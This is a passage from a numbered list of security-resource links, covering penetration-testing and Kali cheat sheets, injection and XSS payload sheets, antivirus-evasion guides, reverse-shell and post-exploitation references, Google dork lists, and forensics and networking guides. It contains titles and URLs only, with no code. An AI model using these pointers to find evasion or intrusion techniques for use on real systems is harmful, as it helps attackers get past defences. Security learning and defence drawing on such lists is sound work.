https://fosslovers.com/100-linux-commands-cheatsheet/ -830-Kali Linux – Penetration Testing Cheat Sheet: https://uwnthesis.wordpress.com/2016/06/.../kali-linux-penetration-testing-cheat-sheet/ -831-Basic Linux Terminal Shortcuts Cheat Sheet : https://computingforgeeks.com/basic-linux-terminal-shortcuts-cheat-sheet/ -832-List Of 220+ Kali Linux and Linux Commands Line {Free PDF} : https://itechhacks.com/kali-linux-and-linux-commands/ -833-Transferring files from Kali to Windows (post exploitation): https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -834-The Ultimate Penetration Testing Command Cheat Sheet for Kali Linux: https://www.hostingland.com/.../the-ultimate-penetration-testing-command-cheat-sheet -835-What is penetration testing? 10 hacking tools the pros use: https://www.csoonline.com/article/.../17-penetration-testing-tools-the-pros-use.html -836-Best Hacking Tools List for Hackers & Security Professionals in 2019: https://gbhackers.com/hacking-tools-list/ -837-ExploitedBunker PenTest Cheatsheet: https://exploitedbunker.com/articles/pentest-cheatsheet/ -838-How to use Zarp for penetration testing: https://www.techrepublic.com/article/how-to-use-zarp-for-penetration-testing/ -839-Wireless Penetration Testing Cheat Sheet; https://uceka.com/2014/05/12/wireless-penetration-testing-cheat-sheet/ -840-Pentest Cheat Sheets: https://www.cheatography.com/tag/pentest/ -841-40 Best Penetration Testing (Pen Testing) Tools in 2019: https://www.guru99.com/top-5-penetration-testing-tools.html -842-Metasploit Cheat Sheet: https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -843-OSCP useful resources and tools; https://acknak.fr/en/articles/oscp-tools/ -844-Pentest + Exploit dev Cheatsheet: https://ehackings.com/all-posts/pentest-exploit-dev-cheatsheet/ -845-What is Penetration Testing? A Quick Guide for 2019: https://www.cloudwards.net/penetration-testing/ -846-Recon resource: https://pentester.land/cheatsheets/2019/04/15/recon-resources.html -847-Network Recon Cheat Sheet: https://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/ -848-Recon Cheat Sheets: https://www.cheatography.com/tag/recon/ -849-Penetration Testing Active Directory, Part II: https://hausec.com/2019/03/12/penetration-testing-active-directory-part-ii/ -850-Reverse-engineering Cheat Sheets: https://www.cheatography.com/tag/reverse-engineering/ -851-Reverse Engineering Cheat Sheet: https://www.scribd.com/doc/38163906/Reverse-Engineering-Cheat-Sheet -852-ATOMBOMBING: BRAND NEW CODE INJECTION FOR WINDOWS: https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows -853-PROPagate: http://www.hexacorn.com/blog/2017/10/26/propagate-a-new-code-injection-trick/ -854-Process Doppelgänging, by Tal Liberman and Eugene Kogan:: https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf -855-Gargoyle: https://jlospinoso.github.io/security/assembly/c/cpp/developing/software/2017/03/04/gargoyle-memory-analysis-evasion.html -856-GHOSTHOOK: https://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/ -857-Learn C: https://www.programiz.com/c-programming -858-x86 Assembly Programming Tutorial: https://www.tutorialspoint.com/assembly_programming/ -859-Dr. Paul Carter's PC Assembly Language: http://pacman128.github.io/pcasm/ -860-Introductory Intel x86 - Architecture, Assembly, Applications, and Alliteration: http://opensecuritytraining.info/IntroX86.html -861-x86 Disassembly: https://en.wikibooks.org/wiki/X86_Disassembly -862-use-of-dns-tunneling-for-cc-communications-malware: https://securelist.com/use-of-dns-tunneling-for-cc-communications/78203/ -863-Using IDAPython to Make Your Life Easier (Series):: https://researchcenter.paloaltonetworks.com/2015/12/using-idapython-to-make-your-life-easier-part-1/ -864-NET binary analysis: https://cysinfo.com/cyber-attack-targeting-cbi-and-possibly-indian-army-officials/ -865-detailed analysis of the BlackEnergy3 big dropper: https://cysinfo.com/blackout-memory-analysis-of-blackenergy-big-dropper/ -866-detailed analysis of Uroburos rootkit: https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg -867-TCP/IP and tcpdump Pocket Reference Guide: https://www.sans.org/security-resources/tcpip.pdf -868-TCPDUMP Cheatsheet: http://packetlife.net/media/library/12/tcpdump.pdf -869-Scapy Cheatsheet: http://packetlife.net/media/library/36/scapy.pdf -870-WIRESHARK DISPLAY FILTERS: http://packetlife.net/media/library/13/Wireshark_Display_Filters.pdf -871-Windows command line sheet: https://www.sans.org/security-resources/sec560/windows_command_line_sheet_v1.pdf -872-Metasploit cheat sheet: https://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf -873-IPv6 Cheatsheet: http://packetlife.net/media/library/8/IPv6.pdf -874-IPv4 Subnetting: http://packetlife.net/media/library/15/IPv4_Subnetting.pdf -875-IOS IPV4 ACCESS LISTS: http://packetlife.net/media/library/14/IOS_IPv4_Access_Lists.pdf -876-Common Ports List: http://packetlife.net/media/library/23/common_ports.pdf -877-WLAN: http://packetlife.net/media/library/4/IEEE_802.11_WLAN.pdf -878-VLANs Cheatsheet: http://packetlife.net/media/library/20/VLANs.pdf -879-VoIP Basics CheatSheet: http://packetlife.net/media/library/34/VOIP_Basics.pdf -880-Google hacking and defense cheat sheet: https://www.sans.org/security-resources/GoogleCheatSheet.pdf -881-Nmap CheatSheet: https://pen-testing.sans.org/blog/2013/10/08/nmap-cheat-sheet-1-0 -882-Netcat cheat sheet: https://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf -883-PowerShell cheat sheet: https://blogs.sans.org/pen-testing/files/2016/05/PowerShellCheatSheet_v41.pdf -884-Scapy cheat sheet POCKET REFERENCE: https://blogs.sans.org/pen-testing/files/2016/04/ScapyCheatSheet_v0.2.pdf -885-SQL injection cheat sheet.: https://information.rapid7.com/sql-injection-cheat-sheet-download.html -886-Injection cheat sheet: https://information.rapid7.com/injection-non-sql-cheat-sheet-download.html -887-Symmetric Encryption Algorithms cheat sheet: https://www.cheatography.com/rubberdragonfarts/cheat-sheets/symmetric-encryption-algorithms/ -888-Intrusion Discovery Cheat Sheet v2.0 for Linux: https://pen-testing.sans.org/retrieve/linux-cheat-sheet.pdf -889-Intrusion Discovery Cheat Sheet v2.0 for Window: https://pen-testing.sans.org/retrieve/windows-cheat-sheet.pdf -890-Memory Forensics Cheat Sheet v1.2: https://digital-forensics.sans.org/media/memory-forensics-cheat-sheet.pdf -891-CRITICAL LOG REVIEW CHECKLIST FOR SECURITY INCIDENTS G E N E R AL APPROACH: https://www.sans.org/brochure/course/log-management-in-depth/6 -892-Evidence collection cheat sheet: https://digital-forensics.sans.org/media/evidence_collection_cheat_sheet.pdf -893-Hex file and regex cheat sheet v1.0: https://digital-forensics.sans.org/media/hex_file_and_regex_cheat_sheet.pdf -894-Rekall Memory Forensic Framework Cheat Sheet v1.2.: https://digital-forensics.sans.org/media/rekall-memory-forensics-cheatsheet.pdf -895-SIFT WORKSTATION Cheat Sheet v3.0.: https://digital-forensics.sans.org/media/sift_cheat_sheet.pdf -896-Volatility Memory Forensic Framework Cheat Sheet: https://digital-forensics.sans.org/media/volatility-memory-forensics-cheat-sheet.pdf -897-Hands - on Network Forensics.: https://www.first.org/resources/papers/conf2015/first_2015_-_hjelmvik-_erik_-_hands-on_network_forensics_20150604.pdf -898-VoIP Security Vulnerabilities.: https://www.sans.org/reading-room/whitepapers/voip/voip-security-vulnerabilities-2036 -899-Incident Response: How to Fight Back: https://www.sans.org/reading-room/whitepapers/analyst/incident-response-fight-35342 -900-BI-7_VoIP_Analysis_Fundamentals: https://sharkfest.wireshark.org/sharkfest.12/presentations/BI-7_VoIP_Analysis_Fundamentals.pdf -901-Bug Hunting Guide: cybertheta.blogspot.com/2018/08/bug-hunting-guide.html -902-Guide 001 |Getting Started in Bug Bounty Hunting: https://whoami.securitybreached.org/2019/.../guide-getting-started-in-bug-bounty-hun... -903-SQL injection cheat sheet : https://portswigger.net › Web Security Academy › SQL injection › Cheat sheet -904-RSnake's XSS Cheat Sheet: https://www.in-secure.org/2018/08/22/rsnakes-xss-cheat-sheet/ -905-Bug Bounty Tips (2): https://ctrsec.io/index.php/2019/03/20/bug-bounty-tips-2/ -906-A Review of my Bug Hunting Journey: https://kongwenbin.com/a-review-of-my-bug-hunting-journey/ -907-Meet the First Hacker Millionaire on HackerOne: https://itblogr.com/meet-the-first-hacker-millionaire-on-hackerone/ -908-XSS Cheat Sheet: https://www.reddit.com/r/programming/comments/4sn54s/xss_cheat_sheet/ -909-Bug Bounty Hunter Methodology: https://www.slideshare.net/bugcrowd/bug-bounty-hunter-methodology-nullcon-2016 -910-#10 Rules of Bug Bounty: https://hackernoon.com/10-rules-of-bug-bounty-65082473ab8c -911-Bugbounty Checklist: https://www.excis3.be/bugbounty-checklist/21/ -912-FireBounty | The Ultimate Bug Bounty List!: https://firebounty.com/ -913-Brutelogic xss cheat sheet 2019: https://brutelogic.com.br/blog/ebook/xss-cheat-sheet/ -914-XSS Cheat Sheet by Rodolfo Assis: https://leanpub.com/xss -915-Cross-Site-Scripting (XSS) – Cheat Sheet: https://ironhackers.es/en/cheatsheet/cross-site-scripting-xss-cheat-sheet/ -916-XSS Cheat Sheet V. 2018 : https://hackerconnected.wordpress.com/2018/03/15/xss-cheat-sheet-v-2018/ -917-Cross-site Scripting Payloads Cheat Sheet : https://exploit.linuxsec.org/xss-payloads-list -918-Xss Cheat Sheet : https://www.in-secure.org/tag/xss-cheat-sheet/ -919-Open Redirect Cheat Sheet : https://pentester.land/cheatsheets/2018/11/02/open-redirect-cheatsheet.html -920-XSS, SQL Injection and Fuzzing Bar Code Cheat Sheet: https://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php -921-XSS Cheat Sheet: https://tools.paco.bg/13/ -922-XSS for ASP.net developers: https://www.gosecure.net/blog/2016/03/22/xss-for-asp-net-developers -923-Cross-Site Request Forgery Cheat Sheet: https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/ -924-CSRF Attacks: Anatomy, Prevention, and XSRF Tokens: https://www.acunetix.com/websitesecurity/csrf-attacks/ -925-Cross-Site Request Forgery (CSRF) Prevention Cheat Sheet : https://mamchenkov.net/.../05/.../cross-site-request-forgery-csrf-prevention-cheat-shee... -926-Guide to CSRF (Cross-Site Request Forgery): https://www.veracode.com/security/csrf -927-Cross-site Request Forgery - Exploitation & Prevention: https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/ -928-SQL Injection Cheat Sheet : https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/ -929-MySQL SQL Injection Practical Cheat Sheet: https://www.perspectiverisk.com/mysql-sql-injection-practical-cheat-sheet/ -930-SQL Injection (SQLi) - Cheat Sheet, Attack Examples & Protection: https://www.checkmarx.com/knowledge/knowledgebase/SQLi -931-SQL injection attacks: A cheat sheet for business pros: https://www.techrepublic.com/.../sql-injection-attacks-a-cheat-sheet-for-business-pros/ -932-The SQL Injection Cheat Sheet: https://biztechmagazine.com/article/.../guide-combatting-sql-injection-attacks-perfcon -933-SQL Injection Cheat Sheet: https://resources.infosecinstitute.com/sql-injection-cheat-sheet/ -934-Comprehensive SQL Injection Cheat Sheet: https://www.darknet.org.uk/2007/05/comprehensive-sql-injection-cheat-sheet/ -935-MySQL SQL Injection Cheat Sheet: pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet -936-SQL Injection Cheat Sheet: MySQL: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mysql/ -937- MySQL Injection Cheat Sheet: https://www.asafety.fr/mysql-injection-cheat-sheet/ -938-SQL Injection Cheat Sheet: https://www.reddit.com/r/netsec/comments/7l449h/sql_injection_cheat_sheet/ -939-Google dorks cheat sheet 2019: https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -940-Command Injection Cheatsheet : https://hackersonlineclub.com/command-injection-cheatsheet/ -941-OS Command Injection Vulnerability: https://www.immuniweb.com/vulnerability/os-command-injection.html -942-OS Command Injection: https://www.checkmarx.com/knowledge/knowledgebase/OS-Command_Injection -943-Command Injection: The Good, the Bad and the Blind: https://www.gracefulsecurity.com/command-injection-the-good-the-bad-and-the-blind/ -944-OS command injection: https://portswigger.net › Web Security Academy › OS command injection -945-How to Test for Command Injection: https://blog.securityinnovation.com/blog/.../how-to-test-for-command-injection.html -946-Data Exfiltration via Blind OS Command Injection: https://www.contextis.com/en/blog/data-exfiltration-via-blind-os-command-injection -947-XXE Cheatsheet: https://www.gracefulsecurity.com/xxe-cheatsheet/ -948-bugbounty-cheatsheet/xxe.: https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md -949-XXE - Information Security: https://phonexicum.github.io/infosec/xxe.html -950-XXE Cheat Sheet: https://www.hahwul.com/p/xxe-cheat-sheet.html -951-Advice From A Researcher: Hunting XXE For Fun and Profit: https://www.bugcrowd.com/blog/advice-from-a-bug-hunter-xxe/ -952-Out of Band Exploitation (OOB) CheatSheet : https://www.notsosecure.com/oob-exploitation-cheatsheet/ -953-Web app penentration testing checklist and cheatsheet: www.malwrforensics.com/.../web-app-penentration-testing-checklist-and-cheatsheet-with-example -954-Useful Resources: https://lsdsecurity.com/useful-resources/ -955-Exploiting XXE Vulnerabilities in IIS/.NET: https://pen-testing.sans.org/.../entity-inception-exploiting-iis-net-with-xxe-vulnerabiliti... -956-Top 65 OWASP Cheat Sheet Collections - ALL IN ONE: https://www.yeahhub.com/top-65-owasp-cheat-sheet-collections-all-in-one/ -957-Hacking Resources: https://www.torontowebsitedeveloper.com/hacking-resources -958-Out of Band XML External Entity Injection: https://www.netsparker.com/web...scanner/.../out-of-band-xml-external-entity-injectio... -959-XXE - ZeroSec - Adventures In Information Security: https://blog.zsec.uk/out-of-band-xxe-2/ -960-Blog - Automated Data Exfiltration with XXE: https://blog.gdssecurity.com/labs/2015/4/.../automated-data-exfiltration-with-xxe.html -961-My Experience during Infosec Interviews: https://medium.com/.../my-experience-during-infosec-interviews-ed1f74ce41b8 -962-Top 10 Security Risks on the Web (OWASP): https://sensedia.com/.../top-10-security-risks-on-the-web-owasp-and-how-to-mitigate-t... -963-Antivirus Evasion Tools [Updated 2019] : https://resources.infosecinstitute.com/antivirus-evasion-tools/ -964-Adventures in Anti-Virus Evasion: https://www.gracefulsecurity.com/anti-virus-evasion/ -965-Antivirus Bypass Phantom Evasion - 2019 : https://www.reddit.com/r/Kalilinux/.../antivirus_bypass_phantom_evasion_2019/ -966-Antivirus Evasion with Python: https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1 -967-Windows oneliners to get shell: https://ironhackers.es/en/cheatsheet/comandos-en-windows-para-obtener-shell/ -968-Does Veil Evasion Still Work Against Modern AntiVirus?: https://www.hackingloops.com/veil-evasion-virustotal/ -969-Google dorks cheat sheet 2019 : https://sanfrantokyo.com/pph5/yxo7.php?xxx=5&lf338=google...cheat-sheet-2019 -970-Malware Evasion Techniques : https://www.slideshare.net/ThomasRoccia/malware-evasion-techniques -971-How to become a cybersecurity pro: A cheat sheet: https://www.techrepublic.com/article/cheat-sheet-how-to-become-a-cybersecurity-pro/ -972-Bypassing Antivirus With Ten Lines of Code: https://hackingandsecurity.blogspot.com/.../bypassing-antivirus-with-ten-lines-of.html -973-Bypassing antivirus detection on a PDF exploit: https://www.digital.security/en/blog/bypassing-antivirus-detection-pdf-exploit -974-Generating Payloads & Anti-Virus Bypass Methods: https://uceka.com/2014/02/19/generating-payloads-anti-virus-bypass-methods/ -975-Apkwash Android Antivirus Evasion For Msfvemon: https://hackingarise.com/apkwash-android-antivirus-evasion-for-msfvemon/ -976-Penetration Testing with Windows Computer & Bypassing an Antivirus: https://www.prodefence.org/penetration-testing-with-windows-computer-bypassing-antivirus -978-Penetration Testing: The Quest For Fully UnDetectable Malware: https://www.foregenix.com/.../penetration-testing-the-quest-for-fully-undetectable-malware -979-AVET: An AntiVirus Bypassing tool working with Metasploit Framework : https://githacktools.blogspot.com -980-Creating an undetectable payload using Veil-Evasion Toolkit: https://www.yeahhub.com/creating-undetectable-payload-using-veil-evasion-toolkit/ -981-Evading Antivirus : https://sathisharthars.com/tag/evading-antivirus/ -982-AVPASS – All things in moderation: https://hydrasky.com/mobile-security/avpass/ -983-Complete Penetration Testing & Hacking Tools List: https://cybarrior.com/blog/2019/03/31/hacking-tools-list/ -984-Modern red teaming: 21 resources for your security team: https://techbeacon.com/security/modern-red-teaming-21-resources-your-security-team -985-BloodHound and CypherDog Cheatsheet : https://hausec.com/2019/04/15/bloodhound-and-cypherdog-cheatsheet/ -986-Redteam Archives: https://ethicalhackingguru.com/category/redteam/ -987-NMAP Commands Cheat Sheet: https://www.networkstraining.com/nmap-commands-cheat-sheet/ -988-Nmap Cheat Sheet: https://dhound.io/blog/nmap-cheatsheet -989-Nmap Cheat Sheet: From Discovery to Exploits: https://resources.infosecinstitute.com/nmap-cheat-sheet/ -990-Nmap Cheat Sheet and Pro Tips: https://hackertarget.com/nmap-cheatsheet-a-quick-reference-guide/ -991-Nmap Tutorial: from the Basics to Advanced Tips: https://hackertarget.com/nmap-tutorial/ -992-How to run a complete network scan with OpenVAS; https://www.techrepublic.com/.../how-to-run-a-complete-network-scan-with-openvas/ -993-Nmap: my own cheatsheet: https://www.andreafortuna.org/2018/03/12/nmap-my-own-cheatsheet/ -994-Top 32 Nmap Command Examples For Linux Sys/Network Admins: https://www.cyberciti.biz/security/nmap-command-examples-tutorials/ -995-35+ Best Free NMap Tutorials and Courses to Become Pro Hacker: https://www.fromdev.com/2019/01/best-free-nmap-tutorials-courses.html -996-Scanning Tools: https://widesecurity.net/kali-linux/kali-linux-tools-scanning/ -997-Nmap - Cheatsheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/nmap/cheatsheet/ -998-Linux for Network Engineers: https://netbeez.net/blog/linux-how-to-use-nmap/ -999-Nmap Cheat Sheet: https://www.hackingloops.com/nmap-cheat-sheet-port-scanning-basics-ethical-hackers/ -1000-Tactical Nmap for Beginner Network Reconnaissance: https://null-byte.wonderhowto.com/.../tactical-nmap-for-beginner-network-reconnaiss... -1001-A Guide For Google Hacking Database: https://www.hackgentips.com/google-hacking-database/ -1002-2019 Data Breaches - The Worst Breaches, So Far: https://www.identityforce.com/blog/2019-data-breaches -1003-15 Vulnerable Sites To (Legally) Practice Your Hacking Skills: https://www.checkmarx.com/.../15-vulnerable-sites-to-legally-practice-your-hacking-skills -1004-Google Hacking Master List : https://it.toolbox.com/blogs/rmorril/google-hacking-master-list-111408 -1005-Smart searching with googleDorking | Exposing the Invisible: https://exposingtheinvisible.org/guides/google-dorking/ -1006-Google Dorks 2019: https://korben.info/google-dorks-2019-liste.html -1007-Google Dorks List and how to use it for Good; https://edgy.app/google-dorks-list -1008-How to Use Google to Hack(Googledorks): https://null-byte.wonderhowto.com/how-to/use-google-hack-googledorks-0163566/ -1009-Using google as hacking tool: https://cybertechies007.blogspot.com/.../using-google-as-hacking-tool-googledorks.ht... -1010-#googledorks hashtag on Twitter: https://twitter.com/hashtag/googledorks -1011-Top Five Open Source Intelligence (OSINT) Tools: https://resources.infosecinstitute.com/top-five-open-source-intelligence-osint-tools/ -1012-What is open-source intelligence (OSINT)?: https://www.microfocus.com/en-us/what-is/open-source-intelligence-osint -1013-A Guide to Open Source Intelligence Gathering (OSINT): https://medium.com/bugbountywriteup/a-guide-to-open-source-intelligence-gathering-osint-ca831e13f29c -1014-OSINT: How to find information on anyone: https://medium.com/@Peter_UXer/osint-how-to-find-information-on-anyone-5029a3c7fd56 -1015-What is OSINT? How can I make use of it?: https://securitytrails.com/blog/what-is-osint-how-can-i-make-use-of-it -1016-OSINT Tools for the Dark Web: https://jakecreps.com/2019/05/16/osint-tools-for-the-dark-web/ -1017-A Guide to Open Source Intelligence (OSINT): https://www.cjr.org/tow_center_reports/guide-to-osint-and-hostile-communities.php -1018-An Introduction To Open Source Intelligence (OSINT): https://www.secjuice.com/introduction-to-open-source-intelligence-osint/ -1019-SSL & TLS HTTPS Testing [Definitive Guide] - Aptive: https://www.aptive.co.uk/blog/tls-ssl-security-testing/ -1020-Exploit Title: [Files Containing E-mail and Associated Password Lists]: https://www.exploit-db.com/ghdb/4262/?source=ghdbid -1021-cheat_sheets: http://zachgrace.com/cheat_sheets/ -1022-Intel SYSRET: https://pentestlab.blog/2017/06/14/intel-sysret -1023-Windows Preventive Maintenance Best Practices: http://www.professormesser.com/free-a-plus-training/220-902/windows-preventive-maintenance-best-practices/ -1024-An Overview of Storage Devices: http://www.professormesser.com/?p=19367 -1025-An Overview of RAID: http://www.professormesser.com/?p=19373 -1026-How to Troubleshoot: http://www.professormesser.com/free-a-plus-training/220-902/how-to-troubleshoot/ -1027-Mobile Device Security Troubleshooting: http://www.professormesser.com/free-a-plus-training/220-902/mobile-device-security-troubleshooting/ -1028-Using Wireshark: Identifying Hosts and Users: https://unit42.paloaltonetworks.com/using-wireshark-identifying-hosts-and-users/ -1029-Using Wireshark - Display Filter Expressions: https://unit42.paloaltonetworks.com/using-wireshark-display-filter-expressions/ -1030-Decrypting SSL/TLS traffic with Wireshark: https://resources.infosecinstitute.com/decrypting-ssl-tls-traffic-with-wireshark/ -1031-A collection of handy Bash One-Liners and terminal tricks for data processing and Linux system maintenance.: https://onceupon.github.io/Bash-Oneliner/ -1032- Bash One-Liners Explained, Part I: Working with files : https://catonmat.net/bash-one-liners-explained-part-one -1033-Bash One-Liners Explained, Part IV: Working with history: https://catonmat.net/bash-one-liners-explained-part-four -1034-Useful bash one-liners : https://github.com/stephenturner/oneliners -1035-Some Random One-liner Linux Commands [Part 1]: https://www.ostechnix.com/random-one-liner-linux-commands-part-1/ -1036-The best terminal one-liners from and for smart admins + devs.: https://www.ssdnodes.com/tools/one-line-wise/ -1037-Shell one-liner: https://rosettacode.org/wiki/Shell_one-liner#Racket -1038-SSH Cheat Sheet: http://pentestmonkey.net/tag/ssh -1039-7000 Google Dork List: https://pastebin.com/raw/Tdvi8vgK -1040-GOOGLE HACKİNG DATABASE – GHDB: https://pastebin.com/raw/1ndqG7aq -1041-STEALING PASSWORD WITH GOOGLE HACK: https://pastebin.com/raw/x6BNZ7NN -1042-Hack Remote PC with PHP File using PhpSploit Stealth Post-Exploitation Framework: http://www.hackingarticles.in/hack-remote-pc-with-php-file-using-phpsploit-stealth-post-exploitation-framework -1043-Open Source database of android malware: www.code.google.com/archive/p/androguard/wikis/DatabaseAndroidMalwares.wiki -1044-big-list-of-naughty-strings: https://github.com/minimaxir/big-list-of-naughty-strings/blob/master/blns.txt -1045-publicly available cap files: http://www.netresec.com/?page=PcapFiles -1046-“Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection”: http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.119.399&rep=rep1&type=pdf -1047-Building a malware analysis toolkit: https://zeltser.com/build-malware-analysis-toolkit/ -1048-Netcat Reverse Shell Cheat Sheet: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet -1049-Packers and crypters: http://securityblog.gr/2950/detect-packers-cryptors-and-compilers/ -1050-Evading antivirus: http://www.blackhillsinfosec.com/?p=5094 -1051-cheat sheets and information,The Art of Hacking: https://github.com/The-Art-of-Hacking -1052-Error-based SQL injection: https://www.exploit-db.com/docs/37953.pdf -1053-XSS cheat sheet: https://www.veracode.com/security/xss -1054-Active Directory Enumeration with PowerShell: https://www.exploit-db.com/docs/46990 -1055-Buffer Overflows, C Programming, NSA GHIDRA and More: https://www.exploit-db.com/docs/47032 -1056-Analysis of CVE-2019-0708 (BlueKeep): https://www.exploit-db.com/docs/46947 -1057-Windows Privilege Escalations: https://www.exploit-db.com/docs/46131 -1058-The Ultimate Guide For Subdomain Takeover with Practical: https://www.exploit-db.com/docs/46415 -1059-File transfer skills in the red team post penetration test: https://www.exploit-db.com/docs/46515 -1060-How To Exploit PHP Remotely To Bypass Filters & WAF Rules: https://www.exploit-db.com/docs/46049 -1061-Flying under the radar: https://www.exploit-db.com/docs/45898 -1062-what is google hacking? and why it is useful ?and how you can learn how to use it: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1063-useful blogs for penetration testers: https://twitter.com/cry__pto/status/1142497470825545729?s=20 -1064-useful #BugBounty resources & links & tutorials & explanations & writeups :: https://twitter.com/cry__pto/status/1143965322233483265?s=20 -1065-Union- based SQL injection: http://securityidiots.com/Web-Pentest/SQL-Injection/Basic-Union-Based-SQL-Injection.html -1066-Broken access control: https://www.happybearsoftware.com/quick-check-for-access-control-vulnerabilities-in-rails -1067-Understanding firewall types and configurations: http://searchsecurity.techtarget.com/feature/The-five-different-types-of-firewalls -1068-5 Kali Linux tricks that you may not know: https://pentester.land/tips-n-tricks/2018/11/09/5-kali-linux-tricks-that-you-may-not-know.html -1069-5 tips to make the most of Twitter as a pentester or bug bounty hunter: https://pentester.land/tips-n-tricks/2018/10/23/5-tips-to-make-the-most-of-twitter-as-a-pentester-or-bug-bounty-hunter.html -1060-A Guide To Subdomain Takeovers: https://www.hackerone.com/blog/Guide-Subdomain-Takeovers -1061-Advanced Recon Automation (Subdomains) case 1: https://medium.com/p/9ffc4baebf70 -1062-Security testing for REST API with w3af: https://medium.com/quick-code/security-testing-for-rest-api-with-w3af-2c43b452e457?source=post_recirc---------0------------------ -1062-The Lazy Hacker: https://securit.ie/blog/?p=86 -1063-Practical recon techniques for bug hunters & pen testers: https://github.com/appsecco/practical-recon-levelup0x02/raw/200c43b58e9bf528a33c9dfa826fda89b229606c/practical_recon.md -1064-A More Advanced Recon Automation #1 (Subdomains): https://poc-server.com/blog/2019/01/18/advanced-recon-subdomains/ -1065-Expanding your scope (Recon automation #2): https://poc-server.com/blog/2019/01/31/expanding-your-scope-recon-automation/ -1066-RCE by uploading a web.config: https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/ -1067-Finding and exploiting Blind XSS: https://enciphers.com/finding-and-exploiting-blind-xss/ -1068-Google dorks list 2018: http://conzu.de/en/google-dork-liste-2018-conzu -1096-Out of Band Exploitation (OOB) CheatSheet: https://www.notsosecure.com/oob-exploitation-cheatsheet/ -1070-Metasploit Cheat Sheet: https://nitesculucian.github.io/2018/12/01/metasploit-cheat-sheet/ -1071-Linux Post Exploitation Cheat Sheet : red-orbita.com/?p=8455 -1072-OSCP/Pen Testing Resources : https://medium.com/@sdgeek/oscp-pen-testing-resources-271e9e570d45 -1073-Out Of Band Exploitation (OOB) CheatSheet : https://packetstormsecurity.com/files/149290/Out-Of-Band-Exploitation-OOB-CheatSheet.html -1074-HTML5 Security Cheatsheet: https://html5sec.org/ -1075-Kali Linux Cheat Sheet for Penetration Testers: https://www.blackmoreops.com/2016/12/20/kali-linux-cheat-sheet-for-penetration-testers/ -1076-Responder - CheatSheet: https://www.ivoidwarranties.tech/posts/pentesting-tuts/responder/cheatsheet/ -1076-Windows Post-Exploitation Command List: pentest.tonyng.net/windows-post-exploitation-command-list/ -1077-Transfer files (Post explotation) - CheatSheet https://ironhackers.es/en/cheatsheet/transferir-archivos-post-explotacion-cheatsheet/ -1078-SQL Injection Cheat Sheet: MSSQL — GracefulSecurity: https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/ -1079-OSCP useful resources and tools: https://acknak.fr/en/articles/oscp-tools/ -1080-Penetration Testing 102 - Windows Privilege Escalation - Cheatsheet: www.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet -1081-Transferring files from Kali to Windows (post exploitation) : https://blog.ropnop.com/transferring-files-from-kali-to-windows/ -1082-Hack Like a Pro: The Ultimate Command Cheat Sheet for Metasploit: https://null-byte.wonderhowto.com/.../hack-like-pro-ultimate-command-cheat-sheet-f... -1083-OSCP Goldmine (not clickbait): 0xc0ffee.io/blog/OSCP-Goldmine -1084-Privilege escalation: Linux : https://vulp3cula.gitbook.io/hackers-grimoire/post-exploitation/privesc-linux -1085-Exploitation Tools Archives : https://pentesttools.net/category/exploitationtools/ -1086-From Local File Inclusion to Remote Code Execution - Part 1: https://outpost24.com/blog/from-local-file-inclusion-to-remote-code-execution-part-1 -1087-Basic Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ -1088-Title: Ultimate Directory Traversal & Path Traversal Cheat Sheet: www.vulnerability-lab.com/resources/documents/587.txt -1089-Binary Exploitation: https://pwndevils.com/hacking/howtwohack.html 1090-A guide to Linux Privilege Escalation: https://payatu.com/guide-linux-privilege-escalation/ -1091-Penetration Testing Tools Cheat Sheet : https://news.ycombinator.com/item?id=11977304 -1092-List of Metasploit Commands - Cheatsheet: https://thehacktoday.com/metasploit-commands/ -1093-A journey into Radare 2 – Part 2: Exploitation: https://www.megabeets.net/a-journey-into-radare-2-part-2/ -1094-Remote Code Evaluation (Execution) Vulnerability: https://www.netsparker.com/blog/web-security/remote-code-evaluation-execution/ -1095-Exploiting Python Code Injection in Web Applications: https://www.securitynewspaper.com/.../exploiting-python-code-injection-web-applicat... -1096-Shells · Total OSCP Guide: https://sushant747.gitbooks.io/total-oscp-guide/reverse-shell.html -1097-MongoDB Injection cheat sheet Archives: https://blog.securelayer7.net/tag/mongodb-injection-cheat-sheet/ -1098-Basic Shellshock Exploitation: https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/ -1099-Wireshark Tutorial and Tactical Cheat Sheet : https://hackertarget.com/wireshark-tutorial-and-cheat-sheet/ -1100-Windows Command Line cheatsheet (part 2): https://www.andreafortuna.org/2017/.../windows-command-line-cheatsheet-part-2-wm... -1101-Detecting WMI exploitation: www.irongeek.com/i.php?page=videos/derbycon8/track-3-03...exploitation... 1102-Metasploit Cheat Sheet - Hacking Land : https://www.hacking.land/2019/02/metasploit-cheat-sheet.html -1103-5 Practical Scenarios for XSS Attacks: https://pentest-tools.com/blog/xss-attacks-practical-scenarios/ -1104-Ultimate gdb cheat sheet: 